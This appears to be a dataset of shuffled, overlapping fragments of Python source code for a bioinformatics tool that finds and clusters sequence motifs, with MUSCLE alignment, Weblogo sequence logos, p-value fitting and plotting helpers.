"time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f secs) (delta: %.2f)'",
"b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b)",
"defaultdict(list) for seq_id, begin, end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances",
"= [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f",
"if min_sig == sig[i]: yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig,",
"[] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO()",
"c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l: code += l return code",
"plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname,",
"n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"in enumerate(cluster.T): c = Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th)",
"sigmoid on the empirical cumulative distribution.\"\"\" def __init__(self, random_state=1): \"\"\"Constructor.\"\"\" self.random_state = random_state",
"motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq >=",
"s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc = np.percentile(locs,",
"def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for",
"txt.append(self._wrap_image(figname, output_type=output_type)) for j in motives: regex_i = motives[i]['regex_seq'] if j != cluster_id:",
"def ecdf(self, x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1,",
"alpha=0.3) plt.grid() plt.title(needle) plt.xlabel('Position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_loc_%d.png' %",
"seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin + (end",
"txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs, all_seqs,",
"regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self,",
"normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num",
"as plt import joblib from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__)",
"multiprocess_fit( pos_seqs, neg_seqs, vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception",
"vectorizer, estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() -",
"txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type)) regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins,",
"seperate headers headers, instances = [list(x) for x in zip(*seqs)] if self.options.sequence_type is",
"Bio.SeqRecord import SeqRecord from corebio.seq import Alphabet, SeqList import weblogolib as wbl from",
"pool.close() pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\"",
"vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs == -1: pool =",
"plt.figure(figsize=size) n, bins, patches = plt.hist( locs, nbins, normed=0, facecolor='blue', alpha=0.3) plt.grid() plt.title(needle)",
"else: txt.append('<p align=\"left\"><img src=\"' + fname + '\" style=\"width: 100%\"></p>') else: if output_type",
"pos_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() code =",
"annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for (orig_header, orig_seq), (seq, score) in",
"= plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'],",
"= self.compute_clusters(seqs, p_value=p_value) motives = self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives",
"for header, begin, end, p, subseq in iterable: new_header = header new_header +=",
"preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in %.2f secs'",
"min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m",
"seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) >",
"= int(begin) end = int(end) subseq = header.split('<subseq>')[1] orig_header = header.split('<loc>')[0] return orig_header,",
"for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1]",
"if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet =",
"'<loc>' + str(begin) + ':' new_header += str(end) + '<loc>' subsequences.append((new_header, subseq)) if",
"beg:%s end:%s width:%s' % (val, start, end, width)) for h, s in seqs:",
"ms: if motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs'])",
"= False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\"",
"def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\"",
"len(xs) + 1) / float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if",
"= [list(x) for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU')",
"p.get() y = [1] * pos_data_matrix.shape[0] neg_data_matrix = n.get() y += [-1] *",
"logger.info(cm) # classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred)))",
"= avg motives[cluster_id]['std_pos'] = std if freq_th is None or freq >= freq_th:",
"len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(",
"self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"info = ' - num co-occurences %d %s vs %d %s: %d' %",
"+= k[0][0] return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster =",
"std_th: _motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict.",
"subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid,",
"sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability']",
"plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw() figname = '%s_dist_%d_vs_%d.png' % (fname, cluster_id_i,",
"= stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case options.unit_name = units options.first_index =",
"multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs)",
"in a cluster with enough space that # kmers dont interfere cluster_seqs =",
"seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs, size=(6, 2), fname=None): \"\"\"plot_cumulative_score.\"\"\"",
"model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None,",
"None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality,",
"> similarity_th: yield rel_nw_score, i, j def merge(self, motives, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10,",
"locs = [] for h, s in haystack: for match in re.finditer(needle, s):",
"params['diags'] = True if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline =",
"to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200):",
"plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show() plt.close() return figname",
"code.append(letter) if len(code) == 0: code_str = None elif len(code) == 1: code_str",
"block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: yield self._decompose_header(header) except Exception as e:",
"= self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) if is_high_quality: info1 = 'Joining:",
"random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs) score, trimmed_align_seqs = self._compute_score(align_seqs,",
"return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines:",
"% (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show()",
"self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet ==",
"scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for line in lines: if",
"seq # ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\"",
"-1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_subarray,",
"motives' % len(motives) txt.append(info) figname = plot_cumulative_score( self, pos_seqs, size=size, fname=fname) txt.append(self._wrap_image(figname, output_type=output_type))",
"%d instances' % data_matrix.shape[0]) start_time = time.time() self.clusterer.set_params(n_clusters=self.n_clusters) if self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix)",
"regex_i = motives[cluster_id]['regex_seq'] figname = plot_location( regex_i, all_seqs, cluster_id=cluster_id, nbins=nbins, size=size, fname=fname) txt.append(self._wrap_image(figname,",
"seq_id in sorted(seqs_summary): cluster_ids = [cluster_id for begin, end, cluster_id in seqs_summary[seq_id]] centers",
"vectorizer=self.vectorizer, estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) self.fit_decomposition(neg_seqs) return self except Exception as e: logger.debug('Failed",
"i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1) rel_nw_score",
"(e - s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc",
"[] for i, p in enumerate(results): loc_start_time = time.time() pos_data_matrix = p.get() matrices",
"> i: seq_i = motives[i]['consensus_seq'] seq_j = motives[j]['consensus_seq'] nw_score = edit_distance(seq_i, seq_j, gap_penalty=-1)",
"from itertools import izip import time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model",
"clusters: start_time = time.time() # align with muscle is_high_quality, motif = self.compute_motif( seqs=clusters[cluster_id],",
"n_j = len(motives[j]['seqs']) seqs = motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs,",
"time.time() preds = [] binary_preds = [] true_targets = [] for i, (p,",
"seq=seq, score=score, min_subarray_size=min_subarray_size, max_subarray_size=max_subarray_size, margin=1, output='all') subseqs = [] for subarray in subarrays:",
"logger.debug('Warning: reverting to default values') logger.debug('ECDF fit on %d values' % (len(scores))) logger.debug('Optimal",
"+ url + '\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return",
"motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info = ' - average location: %.1f +- %.1f'",
"vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time() - start_time d_loc_time = time.time()",
"(score) header += '<subseq>%s<subseq>' % (subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items +=",
"return seq def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for",
"i != j: # find closest instance j from any instance in i",
"time.time() subarrays_items = [] for i, p in enumerate(results): loc_start_time = time.time() subarrays_item",
"zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type is 'protein': alphabet",
"metric='linear') c = linkage(gram_matrix, method='single') orders = [] for id1, id2 in c[:,",
"= [apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable,",
"= maxiters self.maxhours = maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif",
"= defaultdict(list) for pred, seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives'",
"seq in zip(preds, subsequences): self.clusters[pred].append(seq) logger.debug('After clustering, %d motives' % len(self.clusters)) return self.clusters",
"'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True, motif else: return",
"+= '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header += '<subseq>%s<subseq>'",
"neg_data_matrix = n.get() y += [-1] * neg_data_matrix.shape[0] y = np.array(y) true_targets.append(y) data_matrix",
"= np.copy(sig) sigp[sigp < 0] = 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign =",
"sigs = None for scores in smod.score(seqs): sig = np.array(scores) if len(sig) !=",
"= mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer))",
"d_loc_time = time.time() - loc_start_time size = pos_data_matrix.shape logger.debug('%d %s (%.2f secs) (delta:",
"i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet), id=str(i))) handle = StringIO() SeqIO.write(instances_seqrecord, handle,",
"aligned_seqs # ------------------------------------------------------------------------------ class Weblogo(object): \"\"\"A wrapper of weblogolib for creating sequence.\"\"\" def",
"txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p align=\"left\"><img src=\"'",
"logo_txts = self.compute_logo( cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in",
"id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self,",
"subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected. Increase p_value.') logger.debug('Working",
"+ len(seq_j)) if rel_nw_score > similarity_th: yield rel_nw_score, i, j def merge(self, motives,",
"- s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50) std_loc =",
"fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n, bins, patches = plt.hist( ds,",
"len(matches): yield 1 else: yield 0 def occurrences(needle, haystack): \"\"\"occurrences.\"\"\" counts = sum(find_occurrences(needle,",
"ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id for cluster_id",
"SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300,",
"code_str = None elif len(code) == 1: code_str = code[0] else: code_str =",
"vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' %",
"for begin, end, cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id",
"seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size, block_size=self.pos_block_size, n_jobs=self.n_jobs)",
"in seqs]) sigs = None for scores in smod.score(seqs): sig = np.array(scores) if",
"min_subarray_size self.max_subarray_size = max_subarray_size self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs",
"random import pylab as plt import joblib from scipy.optimize import curve_fit import multiprocessing",
"0: code_str = None elif len(code) == 1: code_str = code[0] else: code_str",
"clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self,",
"# it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein'] ): \"\"\"Initialize an instance.\"\"\"",
"[c for c in align_seq] concat_str = np.array(str_list, dtype=np.dtype('a')) cluster.append(concat_str) cluster = np.vstack(cluster)",
"+ (e - s) / 2 locs.append(m) if locs: avg_loc = np.percentile(locs, 50)",
"> sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs = ma.transform(seqs=sample_seqs)",
"half_windw_size)) logger.debug('val:%.1f beg:%s end:%s width:%s' % (val, start, end, width)) for h, s",
"= '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname =",
"on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, # TODO: check if this alphabet",
"pool.close() pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds,",
"'(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster =",
"range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i + 1] return zip(headers, motif_seqs)",
"min_subarray_size=4, max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters",
"self.pos_block_size = pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True,",
"n_jobs=-1): \"\"\"multiprocess_score.\"\"\" start_time = time.time() if n_jobs == -1: pool = mp.Pool() else:",
"# TODO: check if this alphabet is required # it over-rides tool.alphabet alphabet='dna',",
"from collections import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import",
"motives[i]['seqs']: tokens = h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id,",
"n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async(",
"instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type = sequence_type options.ignore_lower_case = ignore_lower_case",
"dim >= min_freq: score += 1 trimmed_align_seqs = [] for h, align_seq in",
"gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c =",
"avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s",
"time.time() for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix =",
"nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s in haystack:",
"c = Counter(row) k = c.most_common() if k[0][0] == '-': to_be_removed.append(i) val =",
"= '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts = self.compute_logo( cluster_id,",
"if score >= min_score and len(align_seqs) > min_cluster_size: return True else: return False",
"txt.append(info) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True): info",
"# seperating headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord =",
"row[i] if norm != 0: row /= norm else: row = np.zeros(row.shape) row[i]",
"\"\"\"compute_clusters.\"\"\" try: subsequences = [] iterable = self.decompose(seqs, p_value=p_value) for header, begin, end,",
"return score, trimmed_align_seqs def _is_high_quality(self, seqs, min_score=4, min_freq=0.6, min_cluster_size=10, sample_size=200): ma = MuscleAlignWrapper(alphabet='rna')",
"figname = None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\"",
"motives[cluster_id] = motif dtime = time.time() - start_time logger.debug( 'Cluster %d (#%d) (%.2f",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Vectorizing') start_time = time.time() matrices =",
"enumerate(izip(pos_results, neg_results)): loc_start_time = time.time() pos_data_matrix = p.get() y = [1] * pos_data_matrix.shape[0]",
"c = Counter(row) k = c.most_common() l = letter_regex(k, size, regex_th=regex_th) if l:",
"# classification logger.info('Classification:') logger.info(metrics.classification_report(y_test, y_binary)) # roc logger.info('ROC: %.3f' % (metrics.roc_auc_score(y_test, y_pred))) except",
"motives[j] success = True if success is False: break # TODO: run the",
"sklearn.cluster import MiniBatchKMeans from eden.sequence import Vectorizer from StringIO import StringIO from Bio",
"logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds",
"- y return p_val def ecdf(x): \"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x)",
"else: code_str = '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th):",
"self.options.sequence_type is 'protein': alphabet = Alphabet('ACDEFGHIKLMNPQRSTVWY') else: alphabet = Alphabet('AGCT') motif_corebio = SeqList(alist=instances,",
"motives' % len(_motives)) return _motives def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10,",
"cluster_id in seqs_summary[seq_id]] centers = defaultdict(list) for begin, end, cluster_id in seqs_summary[seq_id]: centers[cluster_id].append(begin",
"= [] for i in range(n): it = iterable.next() items.append(it) yield items def",
"= np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list) return orig_cooccurence_mtx, norm_cooccurence_mtx, distances",
"else: self.alphabet = IUPAC.unambiguous_dna def _seq_to_stdin_fasta(self, seqs): # seperating headers headers, instances =",
"[-1] * neg_data_matrix.shape[0] y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes)",
"= None elif len(code) == 1: code_str = code[0] else: code_str = '('",
"b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x - a) / b)) class",
"seqs]) sigs = None for scores in smod.score(seqs): sig = np.array(scores) if len(sig)",
"------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self,",
"motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = []",
"half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i in range(half_windw_size, sig_len - half_windw_size): min_sig",
"import Counter from sklearn import metrics from eden.util.NeedlemanWunsh import edit_distance import random import",
"= self.merge( motives, similarity_th=similarity_th, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.quality_filter( seqs,",
"= counts avg, std = extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std",
"yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for",
"motives[i] = motif del motives[j] success = True if success is False: break",
"ids=None): \"\"\"hits.\"\"\" for i in ids: for h, s in motives[i]['seqs']: tokens =",
"# vectorize the seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs)",
"%d %s: %d' % \\ (cluster_id, regex_i, j, regex_j, len(ds)) txt.append(info) if len(ds):",
"% (metrics.roc_auc_score(y_test, y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e)",
"fname: plt.draw() figname = '%s_loc_%d.png' % (fname, cluster_id) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0)",
"self.a, self.b) p_val = 1 - y return p_val def ecdf(x): \"\"\"Empirical cumulative",
"freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None):",
"d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in centers[i]: for c_j in",
"haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\" locs = [] for h, s",
"for h, s in seqs: if s[start:end]: yield (h, s[start:end]) def plot_cumulative_score(smod, seqs,",
"id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None, nbins=20, size=(17, 2), fname=None): \"\"\"plot_location.\"\"\"",
"mp.Pool(n_jobs) results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)]",
"logo for input sequences.\"\"\" # seperate headers headers, instances = [list(x) for x",
"= {'consensus_seq': consensus_seq, 'regex_seq': regex_seq, 'trimmed_align_seqs': trimmed_align_seqs, 'align_seqs': align_seqs, 'seqs': seqs} return True,",
"def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids) -",
"block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Annotating') start_time = time.time() subarrays_items",
"headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord = [] for i,",
"in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores) popt, pcov = curve_fit(sigmoid, xs,",
"enumerate(align_seq) if i not in to_be_removed] trimmed_align_seqs.append((h, ''.join(trimmed_align_seq))) return score, trimmed_align_seqs def _is_high_quality(self,",
"min_cluster_size: consensus_seq = self._compute_consensus_seq(trimmed_align_seqs) regex_seq = consensus_regex(trimmed_align_seqs, regex_th) motif = {'consensus_seq': consensus_seq, 'regex_seq':",
"== 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\" style=\"width: 100%\"></p>') else: txt.append('<p",
"for h, s in haystack: matches = re.findall(needle, s, overlapped=True) if len(matches): yield",
"a:%.2f b:%.2f' % (self.a, self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a,",
"of weblogolib for creating sequence.\"\"\" def __init__(self, output_format='png', # ['eps','png','png_print','jpeg'] stacks_per_line=40, sequence_type='dna', #",
"y = np.array(y) data_matrix = vstack([pos_data_matrix, neg_data_matrix]) estimator.partial_fit(data_matrix, y, classes=classes) d_time = time.time()",
"def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1 -",
"to learn the new class definition logger.debug('After merge, %d motives' % len(motives)) return",
"similarity_th=0.8): for i in motives: for j in motives: if j > i:",
"avg_loc = -1 std_loc = 0 return avg_loc, std_loc def hits(motives, ids=None): \"\"\"hits.\"\"\"",
"'\"></p>') else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self,",
"h.split('<loc>') seq_id = tokens[0] begin, end = tokens[1].split(':') yield (seq_id, int(begin), int(end), i)",
"i in range(len(ids) - 1): start = ids[i] end = ids[i + 1]",
"- average location: %.1f +- %.1f' % (av, st) txt.append(info) txt.append(self._wrap_image(figname, fill_width=False, output_type=output_type))",
"# find closest instance j from any instance in i d_ij = []",
"sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def trim_seqs(seqs, smod,",
"wb = Weblogo(output_format='png', sequence_type=alphabet, resolution=200, stacks_per_line=60, units='bits', color_scheme=color_scheme) logo_image = wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt =",
"scores = p.get() scores_items += scores d_time = time.time() - start_time d_loc_time =",
"estimator)) for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line =",
"= mp.Pool(n_jobs) pos_results = [apply_async( pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(pos_iterable,",
"= MuscleCommandline(**params) stdout, stderr = muscle_cline(stdin=data) return stdout def _fasta_to_seqs(self, headers, stdout): out",
">= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs = sigs",
"for x in zip(*seqs)] if self.options.sequence_type is 'rna': alphabet = Alphabet('ACGU') elif self.options.sequence_type",
"def select_motives(self, seqs=None, p_value=0.05, similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\"",
"scores in smod.score(seqs): sig = np.array(scores) if len(sig) != median_len: logger.debug('Length mismatch: %d",
